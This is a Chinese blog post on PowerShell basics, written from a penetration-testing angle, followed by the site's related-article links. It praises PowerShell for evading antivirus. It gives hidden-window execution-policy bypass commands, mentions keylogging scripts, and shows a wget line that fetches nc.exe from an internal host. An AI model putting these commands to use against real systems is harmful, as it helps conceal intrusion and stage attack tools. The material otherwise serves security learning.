[Windows服务器] PowerShell基础

已于 2024-06-25 17:33:21 修改
阅读量299 收藏 4
点赞数 8
分类专栏: Windows服务器 运维 文章标签: 服务器 运维
于 2024-04-22 08:37:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Da1NtY/article/details/138058010
版权
本文介绍了PowerShell的基础知识,包括其作为Windows系统默认脚本环境的特点,以及如何使用执行策略、绕过权限执行脚本、下载远程数据等实用技巧。特别强调了ExecutionPolicyBypass在渗透测试中的重要性。
摘要由CSDN通过智能技术生成

PowerShell基础

学习目标

了解powershell基础

掌握powershell的常用命令

掌握powershell的执行策略

了解后续工作中powershell的使用场景与集成攻击框架工具安装

简介

Powershell是运行在windows机器上实现系统和应用程序自动化的命令行脚本环境。

特点:

​ 在windows以上版本的操作系统中是默认安装的脚本

​ 可以在内存中运行,不需要写入磁盘

​ 几乎不会触发杀毒软件

​ 可以远程执行

​ 目前很多工具都是基于powershell开发的

​ 使windows脚本的执行变得更容易

​ cmd.exe的运行通常会被阻止,但是powershell的运行通常不会被阻止

​ 可用于管理活动目录

​ 在powershell中是不区分大小写的,命名规范采用的是“动词-名词”

命令

绕过本地执行

powershell.exe -ExecutionPolicy Bypass -File xxx.ps1

本地隐藏绕过权限执行脚本

PowerShell.exe -ExecutionPolicy -NoLogo -Nonlnteractive -NoProfile -WindowStyle hidden -ExecutionPolicy Bypass - file xxx.ps1

(ExecutionPolicy Bypass:绕过执行安全策略,这个参数非常重要,在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数)

WindowStyle hidden:隐藏窗口

NoLogo:启动不显示版权标志的PowerShell

Nonlnteractive(-Nonl):非交互模式,PowerShell不为用户提供交互的提示

NoProfile(-Nop):PowerShell控制台不加载当前用户的配置文件

Noexit:执行后不退出Shell。这在使用键盘记录脚本时非常重要)

powershell下载远程数据

powershell wget "http://172.16.0.107:8000/nc.exe" -outfile "nc.exe"
Da1NtY0926
关注
专栏目录
PowerShell install Windows Admin Center
极致,细节
07-24 2万+
Windows Admin Center 是一个在本地部署的基于浏览器的新管理工具集,让你能够管理 Windows Server,而无需依赖 Azure 或云。 利用 Windows Admin Center,你可以完全控制服务器基础结构的各个方面,对于在未连接到 Internet 的专用网络上管理服务器特别有用。 Windows Admin Center 是“内部”管理工具(例如服务器管理器和 MMC)的现代演进版。 它补充(不是替代)了 System Center。
如何利用PowerShell完成的Windows服务器系统安全加固实践和基线检测
WeiyiGeek 唯一极客IT知识分享
04-11 4975
0x00 前言简述 最近单位在做等保测评,由本人从事安全运维方面的工作(PS:曾经做过等保等方面的安全服务),所以自然而然的与信安的测评人员一起对接相关业务系统的检查,在做主机系统测评检查时发现了系统中某些配置不符合等保要求,需要对不满足要求的主机做进一步整改,好在我们众多的系统基本都是运行在虚拟机上搭建的kubernetes集群中,这样一来就可以尽可能减少加固系统给应用带来的影响,我们可以一台一台加固更新。 在这样环境的驱动下不得不将通宵熬夜,我准备好了枸杞和保温杯,当然也把测试环境也准备了一套,并将以前
Windows PowerShell1-基础知识
寒冰屋的专栏
01-23 1614
PowerShell作为Windows系统中的默认脚本,其实在开发中,我们用的很少。接下来的几篇文章都将PowerShell的相关知识,本章知识介绍PowerShell基本的知识。
PowerShell 基础知识:查询 Windows Server 事件日志
allway2的博客
08-03 1604
如果您通过 PowerShellWindows Server 交互,则可以使用 Get-EventLog、Clear-EventLog、Limit-EventLog、New-EventLog、Remove-EventLog、Show-EventLog 和 Write-EvengLog cmdlet 与这些事件日志进行交互。Get-EventLog 是一个非常有用的 cmdlet,在使用 Server Core 机器时,或者如果您只是想检查您管理的计算机上是否发生了特定事件,您肯定会使用它。......
Windows PowerShell简介
weixin_43224291的博客
11-02 3226
PowerShell简介
服务器系统powershell,Windows Server 2008 R2中的PowerShell
weixin_39667509的博客
08-11 643
Windows Serve 2008 R2中,一个重要改进就是PowerShell版本升级为2.0。Win 2008 R2包括一系列新的服务器管理界面,这些均建立在PowerShell 2.0之上。它新增了240个cmdlets命令集,新的PowerShell图形用户界面也增添了开发功能,从而用户能更简单创建自己的命令行。而且,PowerShell将能够安装到Windows服务器内核。本文将介绍...
使用PowerShell自动化Windows系统管理任务
vvvae1234的博客
08-16 723
PowerShell是由微软开发的一款任务自动化框架,结合了命令行界面与脚本语言,允许系统管理员通过命令和脚本来管理Windows操作系统和其他应用程序。它的底层基于.NET框架,使得管理员能够轻松访问系统管理的各项功能。检查磁盘空间:使用PowerShell cmdlet获取所有服务器的磁盘使用情况。判断可用空间:如果可用空间低于预设阈值,记录日志并发送电子邮件通知。定时执行:将此任务设置为定时任务,每日执行一次。
powershell上传文件到服务器,使用PowerShell使用FTP上载文件
weixin_35048919的博客
08-04 2577
回答(8)3 years ago还有其他一些方法 . 我使用了以下脚本:$File = "D:\Dev\somefilename.zip";$ftp = "ftp://username:password@example.com/pub/incoming/somefilename.zip";Write-Host -Object "ftp url: $ftp";$webclient = New-Obj...
windows服务器知多少
dazer的专栏
12-14 1293
目前主流的windows服务器:server 2010、server2008,下面问题都是自己开发过程中遇到的,只作为记录,并发原创,方 便记忆查找。 win7防火墙入站规则:别人电脑访问自己电脑的规则; win7防火墙出站规则:自己电脑访问别人电脑的规则。 1:配置 window防火墙的进站出站配置(启用防火墙之后系统默认的系统端口往往是被关闭的) 相关配置...
WindowsPowerShell v1.0
02-07
WindowsPowerShell v1.0这个版本中,虽然功能相对现在的新版本可能较为有限,但它奠定了PowerShell的强大基础。如果你的系统上的PowerShell出现问题或需要在旧系统上部署,这个原始版本可能是一个有用的恢复选项。...
WindowsPowerShell实战指南 高清带书签第2版.zip
06-01
书中详细介绍了PowerShell基础知识,包括PowerShell的工作原理、环境设置、基本语法、命令行接口以及如何编写和运行脚本。对于初学者来说,理解PowerShell的核心概念如Cmdlets(命令)、提供程序、管道和对象模型...
powershell远程管理服务器磁盘空间的实现代码
09-21
### Powershell远程管理服务器磁盘空间的实现代码详解 #### 一、背景介绍与环境配置 在日常的服务器管理和维护工作中,对服务器磁盘空间进行监控是一项非常重要的任务。通过有效的磁盘空间管理,可以避免因磁盘...
Windows PowerShell实战指南
02-25
### Windows PowerShell实战指南知识点 #### 一、PowerShell概述 - **定义与作用**: - Windows PowerShell是一种命令行外壳程序和技术,专为基于Windows的操作系统设计,它提供了强大的脚本编写能力,允许用户和...
Systemd:systemctl 命令
风静如云的博客
10-19 163
Target 就是一个 Unit 组,包含许多相关的 Unit。启动某个 Target 的时候,Systemd 就会启动里面所有的 Unit。2.7.5切换Target时关闭前Target中不属于后Target的进程。2.1.5列出所有正在运行的、类型为 service 的 Unit。2.1.2列出所有Unit,包括没有找到配置文件的或者启动失败的。2.7.2查看一个 Target 包含的所有 Unit。2.2.2显示远程主机的某个 Unit 的状态。2.3.2显示某个 Unit 的指定属性的值。
pb生成文件和反射
最新发布
QingTC
10-19 486
指定生成的目录和proto文件路径,使用protoc命令编译.protoecho.pb.hecho.pb.cc。
鸿蒙网络编程系列25-TCP回声服务器的实现
长弓三石
10-19 562
在鸿蒙API10以后,提供了TCPSocketServer类,该类封装了TCP服务端的相关接口,包括用来监听的listen方法,订阅各种事件的on方法,以及发送数据的send方法,关于这些接口的简介见前文。在本示例中,要注意的是TCP服务端是可以接受多个客户端的连接的,也就是说在订阅连接事件的消息并进行处理时,每一个连接(TCPSocketConnection)都代表一个新的TCP客户端,这些客户端都是互相独立的,要处理与客户端的消息收发,就要订阅每一个连接的接收消息事件。
Atlas800昇腾服务器(型号:3000)—CANN安装(二)
weixin_45679938的博客
10-17 394
安装后的路径(以root用户默认安装路径为例):“/usr/local/Ascend/ascendtoolkit/latest/opp/built-in/op_impl/ai_core/tbe/kernel”。二进制算子包依赖CANN软件包Toolkit,执行安装时,当前环境需已安装配套版本的。安装完成后,若显示xxx install success,则说明软件安装成功。否则请执行如下安装命令(如果只有部分软件未安装,则如下命令修改为还未安装的。以上,CANN安装完毕,可以进行om模型转换!
深入探索LINUX中AWK命令:强大的文本处理工具
Java_fenxiang的博客
10-14 594
深入探索LINUX中AWK命令:强大的文本处理工具 AWK 是一种编程语言,专为文本和数据处理设计,它以其强大的文本处理能力和简洁的语法在 Unix/Linux 系统中占据了重要地位。AWK 程序由一系列的模式(pattern)和动作(action)组成,对于输入文件中匹配特定模式的行,AWK 会执行相应的动作。本文将深入...
Atlas800昇腾服务器(型号:3000)—YOLO全系列NPU推理【检测】(五)
weixin_45679938的博客
10-16 992
目前ais_bench工具只支持单个input的带有动态AIPP配置的模型,只支持静态shape、动态batch、动态宽高三种场景,不支持动态shape场景。:ais_bench调用和使用方式与onnx-runtime几乎一致,因此可参考进行撰写脚本!注意,上述耗时未使用AIPP进行前处理加速,如YOLOv8s加速后前处理+推理大约6-7ms。说明:若为覆盖安装,请增加“–force-reinstall”参数强制安装.后处理耗时:除YOLOv10几乎无耗时外,其余1-2ms。开发套件:版本7.0.1【
掌握Windows PowerShell基础与实战指南
这篇文档旨在引导初学者了解并掌握Windows PowerShell基础知识和核心功能。 **Windows PowerShell 简介** Windows PowerShell 不仅仅是一个外壳程序,它还包含了一个强大的脚本语言,使得用户能够编写复杂的自动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Da1NtY0926

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值